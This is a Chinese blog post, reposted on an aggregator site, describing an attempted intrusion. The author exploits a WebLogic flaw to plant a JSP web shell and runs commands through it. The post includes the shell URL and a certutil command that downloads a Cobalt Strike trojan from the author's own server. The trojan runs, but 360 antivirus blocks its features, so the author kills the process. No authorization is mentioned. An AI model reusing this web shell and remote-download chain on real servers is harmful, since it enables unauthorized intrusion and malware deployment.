美文网首页
记一次失败的渗透

记一次失败的渗透

作者: migrate_ | 来源:发表于2019-06-26 15:41 被阅读0次
  1. 利用weblogic漏洞获取了一个shell,执行系统命令,当前是管理员权限
  2. http://x.x.x.x:7001/_async/.shell123.jsp?pwd=123&cmd=dir
    1.jpg

  3. 利用cs生成木马


    2.jpg
  4. 远程下载木马到当前目录
#当前网站目录
D:\Oracle\Middleware\user_projects\domains\base_dtdx_domain
#远程下载命令
http://x.x.x.x:7001/_async/.shell123.jsp?pwd=123&cmd=certutil -urlcache -split -f http://自己的服务器ip/artifact.exe artifact.exe
3.jpg 4.jpg

  1. 运行木马之后的确上线了


    5.jpg

  2. 但是任何功能都使用不了,为什么的呢?不会被杀了吧


    6.jpg
  3. 原来是360全家桶,接下来没思路了,暂且就到这里吧,是时候研究一下免杀了。。。
  4. 结束进程,撤退
tasklist
taskkill /f /pid 000

相关文章

  • 记一次失败的渗透

    利用weblogic漏洞获取了一个shell,执行系统命令,当前是管理员权限 http://x.x.x.x:700...

  • 第一次渗透(失败)

    在某测试平台,测试了一批授权网站。 第一步:找注入。用啊D测注入点,一连测试了几个都没有,最后终于有了一个,然后注...

  • 2018-08-05

    记第一次面试家教,失败。

  • [渗透测试]记一次渗透测试经历

    0x01 前言 第一次做渗透测试,结果虽然不太满意,但是还是收获了许多。下面总结一下在本次渗透测试中的流程和套路。...

  • 记一次猥琐的渗透

    前言 有一次渗透中遇到了一个一个网站,上面只有一个imgaes.php的shell和一个别的一句话木马还有一个ph...

  • 记一次渗透测试

    信息收集 在一次测试中对某网站进行渗透。 选择扫描目录,没有后台。但是爆出phpninfo的信息。。竟然是serv...

  • 记一次内网渗透

    前言 某次测试一网站发现struts2-045漏洞。通过翻看文件夹上传文件到不同端口进行访问。 进而getshel...

  • 一次艰难的网站渗透

    信息收集 对某网站进行的一次渗透过程。存在php探针,phpinfo,phpmyadmin 弱口令登录失败。网站使...

  • 记一次难忘的渗透测试

    本文为原创文章,转载请注明出处! 0*00前言 前几天,我一个朋友叫我帮忙测试一下他们公司的网站,本来我是不愿意的...

  • 记一次失败

    我失业了,刚刚开始的工作,我就失业了。 在第二天,我失业了! 这让我很受打击。 昨天找了一个兼职,写评论,千字二十...

网友评论

      本文标题:记一次失败的渗透

      本文链接:https://www.haomeiwen.com/subject/llvccctx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|记一次失败的渗透|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!